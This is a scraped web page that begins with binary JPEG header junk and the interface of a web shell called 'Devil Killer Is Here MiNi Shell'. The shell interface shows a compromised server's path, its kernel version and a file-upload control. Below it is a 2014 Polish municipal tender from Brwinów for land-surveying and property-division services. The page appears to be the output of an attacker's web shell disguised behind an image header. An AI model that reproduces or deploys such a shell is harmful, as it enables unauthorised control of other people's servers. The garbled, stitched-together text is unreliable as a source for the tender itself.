JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140123/14877-N-2014.html

<p class="kh_header"><b>Brwinów: USŁUGI GEODEZYJNE- ETAP I</b><br>
<b>Numer ogłoszenia: 14877 - 2014; data zamieszczenia: 23.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Brwinów , ul. Grodziska 12, 05-840 Brwinów, woj. mazowieckie, tel. 7382567, faks 7295940.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brwinow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGI GEODEZYJNE- ETAP I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są: 
Część I. Sporządzenie map do zasiedzenia:
Zadanie 1. nieruchomości położonej w Brwinowie obr. 17, oznaczonej jako działka nr ew. 34.
Zadanie 2. nieruchomości innych niż wskazana w zadaniu 1.
Do każdego opracowania należy dołączyć (zadanie 1 i 2 ):
- odbitki w ilości 5 szt.,
- badania hipoteczne (wszystkie działy z podaniem numerów wniosków i podaniem podstawy wpisów oraz nr kart w przypadku starych ksiąg lub Zbiorów Dokumentów, na których wpisano lub załączono tytuły własności),
- kopię protokołu granicznego,
- kopię wykazu zmian gruntowych
Maksymalna  ilość opracowań dla  zadania 2. w okresie obowiązywania umowy - dla 3 działek. 

Część II. Sporządzenie map do komunalizacji:
Zadanie 1. nieruchomości położonej w miejscowości Grudów, oznaczonej w ewidencji gruntów jako działka nr 11/1.
Zadanie 2. nieruchomości położonej w Brwinowie obr. 21, oznaczonej w ewidencji gruntów jako działki nr 178/1 część i 192/5, stanowiące ul. Leśnej Polany i ul. Jodłową.
Zadanie 3. nieruchomości położonej w Brwinowie obr. 17, oznaczonej w ewidencji gruntów jako działka nr 194/6, stanowiącej ul. Kościuszki.
Zadanie 4. nieruchomości położonej w Brwinowie obr. 18, oznaczonej w ewidencji gruntów jako działka nr 34, stanowiącej ul. Stalową.
Zadanie 5. dla nieruchomości innych niż wymienione w zadaniach od 1 do 4 . 
Do każdego opracowania należy dołączyć (zadanie 1-5):
- odbitki w ilości 5 szt.,
- badania hipoteczne (wszystkie działy z podaniem numerów wniosków i podaniem podstawy wpisów oraz nr kart w przypadku starych ksiąg lub Zbiorów Dokumentów, na których wpisano lub załączono tytuły własności),
- kopię protokołu granicznego,
- kopię wykazu zmian gruntowych.
Maksymalna  ilość  opracowań dla  zadania 5  w okresie obowiązywania umowy - dla 5 działek 

Część III. Sporządzenie map do regulacji stanu prawnego dróg gminnych (art. 73 ustawy z dnia 13 października 1998r. Przepisy wprowadzające ustawy reformujące administrację publiczną Dz.U.
 z 1998r. Nr 133, poz. 872 ze zm.):
Zadanie 1. dla nieruchomości stanowiącej ul. Józefowską w miejscowości Krosna-Wieś, obecnie składającej się, wg ewidencji gruntów, z działki nr 96, na odcinku pomiędzy działkami o nr ew. 97 do 103 - 14 hektometrów.
Zadanie 2. dla nieruchomości stanowiącej ul. Marianka w miejscowości Krosna-Wieś, na odcinku obecnie składającym się, wg ewidencji gruntów, z działki nr 102 - 8 hektometrów.
Zadanie 3. dla nieruchomości stanowiącej ul. Kazimierzowską w miejscowości Owczarnia, na odcinku obecnie składającym się, wg ewidencji gruntów, z działki nr 129/2 - 2 hektometry.
Zadanie 4. dla nieruchomości wchodzących w skład ul. Łokietka w miejscowości Owczarnia, stanowiących obecnie, wg ewidencji gruntów, działki nr 77/13, 77/7 i 77/17 (na odcinku pomiędzy działkami nr ew. 77/16 do 41/6) - 3 hektometry.
Zadanie 5. dla nieruchomości wchodzących w skład ul. Słonecznej w miejscowości Otrębusy, stanowiących obecnie, wg ewidencji gruntów, działki nr 343/2, 345/11, 353/2, 356/7, 356/8 i 599 - 1 hektometr.
Zadanie 6. dla nieruchomości stanowiącej ul. Łosia w miejscowości Otrębusy, obecnie składającej się, wg ewidencji gruntów, z działki nr 248/1 - 3 hektometry.
Zadanie 7. dla nieruchomości stanowiącej ul. Przejazdową w miejscowości Otrębusy, obecnie składającej się, wg ewidencji gruntów z działki nr 260 -  4 hektometry.
Zadanie 8. dla nieruchomości stanowiącej ul. Szczęsną w miejscowości Kanie, obecnie składającej się, wg ewidencji gruntów, z działki nr 919 - 1 hektometr.
Zadanie 9. dla nieruchomości stanowiących ul. Otrębuską w Brwinowie obr. 18, składającej się obecnie, wg ewidencji gruntów z działek nr 35/2 i 35/1 oraz w Brwinowie obr. 21 składającej się wg ewidencji gruntów z działek nr 108/8, 108/7, 178/1część i 179/1 - 8 hektometrów.
Zadanie 10. dla nieruchomości stanowiących ul. Kępińską w Brwinowie obr. 20, obecnie składającej się, wg ewidencji gruntów, z działki nr 254/1, na odcinku pomiędzy działkami o nr 1/9 do 86 (ul. Raszyńska) - 5 hektometrów.
Zadanie 11.	dla nieruchomości stanowiących ul. Lilpopa w Brwinowie obr. 19, obecnie składającej się wg ewidencji gruntów z działek nr 56/4 i 56/5 oraz w Brwinowie obr. 20, obecnie składającej się, wg ewidencji gruntów, z działki nr 137/7 - 19 hektometrów.
Zadanie 12. dla nieruchomości stanowiących ul. Zamkową w Brwinowie obr. 20, obecnie składającej się, wg ewidencji gruntów, z działki nr 230 i w Otrębusach składającej się z części działki nr 137/10 - 1 hektometr.
Zadanie 13.dla nieruchomości innych niż wymienione w punktach od 1 do 12.
Maksymalna ilość opracowań dla  zadania 13 w okresie obowiązywania umowy - 10 (łącznie opracowania obejmować będą maksymalnie 10 hektometrów).
Do każdego opracowania należy dołączyć (zadania 1-13):
- odbitki w ilości 5 szt.
- badania hipoteczne (2 egz. wszystkie działy z podaniem numerów wniosków i podstawy wpisów). Dla nieruchomości opisanych w dawnych księgach hipotecznych należy podać stronę (od-do), na której uwidoczniony jest tytuł prawny do nieruchomości .W przypadku, gdy część działki została odłączona należy wykonać szkic historyczny nieruchomości z oznaczeniem zajętości pod drogę na dzień 31.12.1998r.
- kopię protokołu ustalenia zajęcia pod drogę publiczną na dzień 31.12.1998r.
- wykaz nieruchomości zajętych pod drogi publiczne z podaniem właścicieli i ich adresów,
- wykaz zmian gruntowych.

Część IV. Rozgraniczenie nieruchomości, zgodnie z ustawą z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne (tekst jednolity Dz. U. z 2010 r. Nr 193, poz. 1287ze zm.).
Maksymalna ilość opracowań w okresie obowiązywania umowy- 20 działek.

Część V. Wyznaczenie punktów granicznych nieruchomości z ewentualnym wykazem zmian gruntowych oraz stabilizacją punktów granicznych prętem metalowym i protokołem okazania granic.
Maksymalna ilość opracowań w okresie obowiązywania umowy- 70 punktów.

Część VI. Podział nieruchomości (w tym wstępny projekt podziału i sporządzenie mapy z projektowanym podziałem nieruchomości) wraz ze stabilizacją punktów granicznych prętem metalowym
Zadanie 1. Podział nieruchomości położonych w miejscowości Kanie, oznaczonych w ewidencji gruntów jako działki nr 401/1, 401/2, 401/3, 402 i 403/4, z przeznaczeniem na ul. Poranną.
Zadanie 2. Podział nieruchomości położonych w miejscowości Otrębusy, oznaczonych w ewidencji gruntów jako działki nr 569/2, 569/3, 569/4, 569/5, 570/21, z przeznaczeniem na ul. Poranną, zgodnie ze wstępnym projektem podziału będącym w posiadaniu urzędu.
Zadanie 3. Podział nieruchomości położonej w miejscowości Żółwin, oznaczonej w ewidencji gruntów jako działka nr 22/57, z przeznaczeniem na poszerzenie ul. Szkolnej.
Zadanie 4. Podział nieruchomości położonej w miejscowości Domaniew, oznaczonej w ewidencji gruntów jako działka nr 132/12, na 5 działek.
Zadanie 5. Podział nieruchomości innych niż określone w zadaniach od 1do 4.
Maksymalna  ilość  opracowań  dla zadania 5 w okresie obowiązywania umowy - 20 działek. 

Część VII. Wykonanie wykazu zmian gruntowych wraz ze wskazaniem punktów granicznych z załącznikiem graficznym, dotyczącego użytków wraz z protokołem wyznaczenia granic oraz stabilizacją prętami metalowymi:
Maksymalna ilość opracowań w okresie obowiązywania umowy - 14 (łącznie opracowania obejmować będą maksymalnie 14 hektometrów).

Część VIII. Wykonanie opracowania w celu doprowadzenia do zgodności zapisów w księdze wieczystej i ewidencji gruntów dla nieruchomości:
Zadanie 1. położonych w Brwinowie obr. 6, oznaczonych w ewidencji gruntów jako działki nr 209/1, 209/2 i 209/3, stanowiące ul. Wigusin oraz działki ewidencyjnej nr 195, stanowiącej ul. Skudro.
Zadanie 2. położonej w Brwinowie obr. 15, oznaczonej w ewidencji gruntów jako działka nr 14, stanowiąca ul. Wspólną.
Zadanie 3. dla nieruchomości innych niż wymienione w pkt. 1 i 2.
Maksymalna ilość opracowań dla zadania 3 w okresie obowiązywania umowy - 10 (łącznie opracowania obejmować będą maksymalnie 10 hektometrów).

Część IX. Wykonanie opracowania mającego na celu doprowadzenie do uregulowania stanu prawnego nieruchomości położonych w miejscowościach Moszna-Wieś - działki nr ew. 299/89, 299/5, 120/10 i Moszna-Parcela - działka nr 51/19.

2. Przedmioty zamówienia określone w częściach I - IX w ust.1 muszą być wykonane zgodnie z obowiązującymi przepisami, w szczególności przepisami ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (tekst jednolity Dz.U. z 2010r. Nr 102 poz. 651 ze zm.) i ustawy z dnia 17 maja 1989 r. Prawo Geodezyjne i Kartograficzne (tekst jednolity Dz. U. z 2010 r. Nr 193 poz. 1287 ze zm.).
3. Na wykonany przedmiot zamówienia Wykonawca udziela co najmniej 36-miesięcznej rękojmi za wady, na dokonanie poprawek..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w wysokości do 50% wartości zamówienia podstawowego w każdej części oddzielnie, polegające na powtórzeniu tego samego rodzaju zamówień. Na zamówienia uzupełniające zostanie zawarta odrębna umowa na podstawie art.67 ust.1 pkt.6 ustawy Pzp.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.21.00-1, 71.22.22.00-2, 71.35.40.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność stanowiąca przedmiot zamówienia nie wymaga posiadania szczególnych uprawnień wynikających z przepisów prawa.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- w okresie 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali lub wykonują co najmniej3 usługi geodezyjne o podobnym charakterze, których zakres jest zgodny z przedmiotem zamówienia, na który składana jest oferta. Powyższy zapis dotyczy każdej części zamówienia.

1. Ocena sposobu dokonywania spełniania warunków udziału w postępowaniu będzie dokonana wg formuły spełnia/nie spełnia w oparciu o złożone dokumenty. Nie spełnienie w/w warunków skutkować będzie wykluczeniem z postępowania.

2. W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy, łączne doświadczenie i wiedza oraz ich łączna sytuacja ekonomiczna i finansowa.

3. Wykaz oświadczeń i dokumentów, jakie Wykonawcy mają dostarczyć w celu potwierdzenia spełnienia warunków udziału w postępowaniu:
1) Oświadczenie o spełnianiu warunków udziału w postępowaniu na załączniku nr 2;
2) załącznik nr 3 - wykaz wykonanych lub wykonywanych, głównych usług wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem  przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;
Za główne usługi Zamawiający uważa zamówienia potwierdzające spełnienie warunku określonego w  pkt 1.1.2 SIWZ.
a) Dowodami są: 
-  poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert,
- oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia. 
b) Zgodnie z § 9 ust.2 rozporządzenia  Prezesa Rady Ministrów z dnia 19 lutego 2013 r. o dokumentach, w miejsce poświadczeń Wykonawca może przedłożyć dokumenty potwierdzające należyte wykonanie usług - według poprzednio obowiązującego rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2011 r. o dokumentach.
c) Jeżeli Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie - załączniku nr 3, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.
W razie konieczności, szczególnie gdy wykaz usług lub dowody, o których mowa powyżej, budzą wątpliwości Zamawiającego lub gdy z poświadczenia albo z innego dokumentu wynika, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, Zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego usługi były lub miały zostać wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio Zamawiającemu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dysponuje lub będą dysponował co najmniej 1 osobą- posiadającą uprawnienia zawodowe do wykonywania samodzielnych funkcji w dziedzinie geodezji i kartografii określone w ustawie z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne (tekst jednolity Dz. U. z 2010 r. Nr 193, poz. 1287 ze zm.).

1. Ocena sposobu dokonywania spełniania warunków udziału w postępowaniu będzie dokonana wg formuły spełnia/nie spełnia w oparciu o złożone dokumenty. Nie spełnienie w/w warunków skutkować będzie wykluczeniem z postępowania.

2. W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy, łączne doświadczenie i wiedza oraz ich łączna sytuacja ekonomiczna i finansowa.

3. Wykaz oświadczeń i dokumentów, jakie Wykonawcy mają dostarczyć w celu potwierdzenia spełnienia warunków udziału w postępowaniu:
1) Oświadczenie o spełnianiu warunków udziału w postępowaniu na załączniku nr 2;
1) załącznik nr 4 - wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacja o podstawie do dysponowania tymi osobami;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia innych podmiotów. W takiej sytuacji Wykonawca jest zobowiązany udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
UWAGA! Treść zobowiązania podmiotu trzeciego  powinna określać : 
a) kto jest podmiotem udostępniającym i przyjmującym zasoby, 
b) sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia;
c) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.
W sytuacji gdy przedmiotem udzielenia są zasoby nierozerwalnie związane z podmiotem ich udzielającym (wiedza i doświadczenie), niemożliwe do samodzielnego obrotu i dalszego udzielenia ich bez zaangażowania tego podmiotu w wykonaniu zamówienia, taki dokument powinien zawierać wyraźne nawiązanie do formy uczestnictwa tego podmiotu w wykonaniu zamówienia (np. podwykonawstwo, doradztwo, nadzór lub inne). 
Uwaga: Zamawiający rozróżnia uczestnictwo podmiotu od jego udziału w realizacji części zamówienia, z czym wiąże się zakres wymaganych dokumentów od podmiotu trzeciego, zgodnie z treścią przepisów rozporządzenia Prezesa Rady Ministrów w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane, którego zapisy wyraźnie odróżniają sytuację polegania na zasobach innych podmiotów (par. 1 ust. 6) od polegania na zasobach innych podmiotów, jeżeli podmioty te będą brały udział w realizacji części zamówienia (par. 3 ust.4). 
